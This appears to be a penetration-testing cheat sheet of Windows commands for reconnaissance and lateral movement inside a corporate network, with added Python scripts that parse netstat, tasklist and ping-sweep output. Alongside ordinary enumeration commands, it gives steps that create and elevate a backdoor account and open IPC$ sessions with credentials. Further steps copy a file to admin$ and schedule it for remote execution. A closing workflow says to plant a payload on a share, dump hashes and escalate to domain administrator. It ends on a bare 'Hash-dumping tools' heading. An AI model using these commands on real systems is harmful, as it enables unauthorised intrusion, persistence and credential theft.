Information collection

 

Local host:

```
set ----- Show the environment variables
whoami ----- Current user account
ipconfig /all ----- IP configuration of the local host (addresses, DNS suffix, DNS servers)
net user ----- Local user list
net user test test /add ----- Add a local user "test" with password "test"
net localgroup administrators test /add ----- Put that account into the local Administrators group
net localgroup administrators ----- List the members of the local Administrators group
systeminfo ----- System information (OS version, hotfixes, domain membership)
winver ----- Windows version dialog
tasklist /svc ----- Processes, with the services hosted by each one
netstat -ano ----- Network connections and listening ports, with the owning PID
net use \\IP\ipc$ password /user:username ----- Establish an IPC$ session to a remote host
```

Domain:

```
net user /domain ----- Domain user list
net view /domain ----- List of domains
net view /domain:domainname ----- Computers in the named domain or workgroup
net group "domain admins" /domain ----- Members of Domain Admins
net user administrator /domain ----- Details of a domain user (here "administrator")
net view ----- Machines in the current domain / workgroup
arp -a ----- Locally cached ARP entries (IP to MAC of recently contacted hosts)
```

```
net view \\IP ----- Shares offered by a host
net group /domain ----- Domain groups
net group "domain controllers" /domain ----- Domain controllers
net localgroup administrators /domain ----- Administrators group as seen on the domain controller (/domain runs the command against the PDC)
net localgroup administrators workgroup\user001 /add ----- Add a domain user to the local Administrators group
net time /domain ----- Locate the primary domain controller; the PDC emulator is normally the domain time server
net config workstation ----- Workstation configuration, including the logon domain
```

Tips:

1. Run tasklist /svc to find the PID that hosts the service you care about, then netstat -ano to find the port that PID is listening on.

```
C:\>tasklist /svc
svchost.exe                   1128 TermService

C:\>netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       424
  TCP    0.0.0.0:3399           0.0.0.0:0              LISTENING       1128   // PID 1128 is TermService: Remote Desktop listens on 3399, not the default 3389
```
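Doing that join by hand is fine for one service; when you have pulled both outputs off a box it is quicker to let a script map every listening port to its PID, image and services. The following Python is an added example, not code from the original notes: the tasklist /svc and netstat -ano text embedded in it is constructed for the example (it extends the page's 3399/TermService case with an IPv6 row and a UDP row, which has no State column and must be parsed differently), and the column layout it assumes is that of the English Windows output.

```python
import re

# Constructed sample output (not real captures): what `tasklist /svc` and
# `netstat -ano` print on a host where Remote Desktop listens on 3399.
TASKLIST_SVC = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
svchost.exe                    688 RpcSs
svchost.exe                   1128 TermService
svchost.exe                   1436 Dnscache, NlaSvc
lsass.exe                      424 KeyIso, SamSs
"""

NETSTAT_ANO = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       688
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       424
  TCP    0.0.0.0:3399           0.0.0.0:0              LISTENING       1128
  TCP    10.9.10.5:3399         10.9.10.7:49211        ESTABLISHED     1128
  TCP    [::]:135               [::]:0                 LISTENING       688
  UDP    0.0.0.0:53             *:*                                    1436
"""

# Image name (may contain spaces), right-aligned PID, then the service list.
_TASK_RE = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<svcs>.*?)\s*$")


def parse_tasklist_svc(text):
    """Map PID -> (image name, [service names]) from `tasklist /svc` output."""
    procs = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Image Name", "=")):
            continue  # header and separator rows
        m = _TASK_RE.match(line)
        if not m:
            continue
        svcs = [] if m["svcs"] == "N/A" else [s.strip() for s in m["svcs"].split(",")]
        procs[int(m["pid"])] = (m["image"], svcs)
    return procs


def parse_netstat_ano(text):
    """Return (proto, local_ip, local_port, state, pid) per `netstat -ano` row.
    TCP rows carry a State column, UDP rows do not, so the column count differs."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner and header lines
        proto, local = parts[0], parts[1]
        ip, port = local.rsplit(":", 1)  # rsplit copes with [::]:135 style IPv6 sockets
        if proto == "TCP":
            state, pid = parts[3], parts[4]
        else:
            state, pid = "", parts[3]  # UDP: no state column
        rows.append((proto, ip, int(port), state, int(pid)))
    return rows


def listening_table(tasklist_text, netstat_text):
    """Join the two outputs: one entry per listening TCP socket or bound UDP socket,
    with the owning image and hosted services (PID 4 is the kernel, 'System')."""
    procs = parse_tasklist_svc(tasklist_text)
    table = []
    for proto, ip, port, state, pid in parse_netstat_ano(netstat_text):
        if proto == "TCP" and state != "LISTENING":
            continue  # established and closing sockets are not what we are hunting for
        image, svcs = procs.get(pid, ("<unknown>", []))
        table.append({"proto": proto, "ip": ip, "port": port, "pid": pid,
                      "image": image, "services": svcs})
    return table


def ports_for_service(tasklist_text, netstat_text, service):
    """Answer the tip's question directly: which TCP ports does this service listen on?"""
    return sorted({e["port"] for e in listening_table(tasklist_text, netstat_text)
                   if e["proto"] == "TCP" and service in e["services"]})


if __name__ == "__main__":
    for e in listening_table(TASKLIST_SVC, NETSTAT_ANO):
        print(f"{e['proto']:<4}{e['ip']:<12}{e['port']:<6}{e['pid']:<6}"
              f"{e['image']:<14}{','.join(e['services'])}")
    print("TermService ->", ports_for_service(TASKLIST_SVC, NETSTAT_ANO, "TermService"))
```

A non-default port for TermService, as here, is the kind of thing worth noting for later: it is where RDP will be reachable once you have credentials.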

2. Find live hosts in the internal class C (/24) segment

```
for /l %i in (1,1,255) do @ping 10.9.10.%i -w 1 -n 1 | find /i "TTL"
// Reply from 10.9.10.1: bytes=32 time=4ms TTL=61
```

Inside a .bat file the loop variable is written %%i. The -w value is a timeout in milliseconds, so raise it on slow links, and hosts that drop ICMP will not appear at all.
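The reply lines that survive the find filter carry more than a list of addresses: the TTL is the sender's initial TTL (64 for most Linux/Unix, 128 for Windows, 255 for many network devices) minus the hops crossed, so it gives a rough OS guess and a distance. The Python below is an added example, not part of the original notes, that parses such output into sorted host records with that inference; the sweep lines it contains are constructed for the example (the first one is the page's own sample reply), and the TTL heuristic is exactly that: a heuristic that firewalls and load balancers rewriting TTL can defeat.

```python
import re

# Constructed sample (not a real capture) of what the one-liner above leaves on
# screen: `find /i "TTL"` keeps only the reply lines, one per live host.
SWEEP_OUTPUT = """\
Reply from 10.9.10.1: bytes=32 time=4ms TTL=61
Reply from 10.9.10.5: bytes=32 time<1ms TTL=128
Reply from 10.9.10.201: bytes=32 time=1ms TTL=128
Reply from 10.9.10.254: bytes=32 time=2ms TTL=255
Reply from 10.9.10.30: bytes=32 time=9ms TTL=49
"""

# Windows prints "time<1ms" for sub-millisecond replies, hence time[<=].
_REPLY_RE = re.compile(
    r"Reply from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}): bytes=\d+ time[<=](?P<rtt>\d+)ms TTL=(?P<ttl>\d+)"
)

# Common initial TTL values and the platform families that use them. The observed
# TTL is the initial value minus the number of routers crossed, so the smallest
# initial value that is >= observed gives both a guess and a hop count.
INITIAL_TTLS = ((64, "Linux/Unix"), (128, "Windows"), (255, "network device / Solaris"))


def guess_os(ttl):
    """Return (os family, hops) for an observed TTL; unknown above 255."""
    for initial, family in INITIAL_TTLS:
        if ttl <= initial:
            return family, initial - ttl
    return "unknown", 0


def parse_sweep(text):
    """Turn the find-filtered ping lines into records sorted by IP address."""
    hosts = []
    for line in text.splitlines():
        m = _REPLY_RE.search(line)
        if not m:
            continue  # 'Request timed out.' and 'Destination host unreachable.' carry no TTL
        ttl = int(m["ttl"])
        family, hops = guess_os(ttl)
        hosts.append({"ip": m["ip"], "rtt_ms": int(m["rtt"]), "ttl": ttl,
                      "os_guess": family, "hops": hops})
    # Sort numerically by octet, not as strings (10.9.10.30 before 10.9.10.201).
    hosts.sort(key=lambda h: tuple(int(o) for o in h["ip"].split(".")))
    return hosts


def live_hosts(text):
    """Just the addresses, ready to feed into the next step (net view against each host)."""
    return [h["ip"] for h in parse_sweep(text)]


if __name__ == "__main__":
    for h in parse_sweep(SWEEP_OUTPUT):
        print(f"{h['ip']:<14} ttl={h['ttl']:<4} {h['os_guess']} ({h['hops']} hops away)")
```

Read against the page's own sample, TTL=61 says 10.9.10.1 is most likely a Unix-type host three routers away from where the ping was sent, which is worth knowing before you point Windows-only tooling at it.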

3. Domain controller

The domain controller and the DNS server are usually the same machine, so resolving the domain name leads you to a domain controller.

```
nbtstat -a test.com ----- NetBIOS name table of the host the domain name resolves to
ping test.com ----- Resolve the domain name; the address returned belongs to a domain controller
```

4. IPC$ connection

```
net use \\10.9.10.201\ipc$ abc123! /user:administrator           // IPC$ session with a local account
net use \\10.9.10.201\ipc$ abc123! /user:test.com\administrator  // the same with a domain account
net use * /del /yes                                              // drop all sessions without prompting
copy 111.txt \\10.9.10.201\admin$                                // copy a file into the remote Windows directory via admin$
net time \\10.9.10.201                                           // read the remote clock
at \\10.9.10.201 1:40 111.txt                                    // schedule the file to run at 01:40 remote time
```

Writing to admin$ needs an account that is an administrator on the target. The at scheduler is deprecated on current Windows versions; schtasks with /s and /u does the same job where at is gone.

5. Intranet penetration workflow

A. Get control of one server, then use it to collect intranet information: how many domains there are, which accounts are domain administrators, and what is shared inside the domain.

B. If there is a writable share, drop the payload through it, upload a hash-dumping tool, dump the local hashes, and work from those towards a domain administrator account.


Hash-dumping tools

 
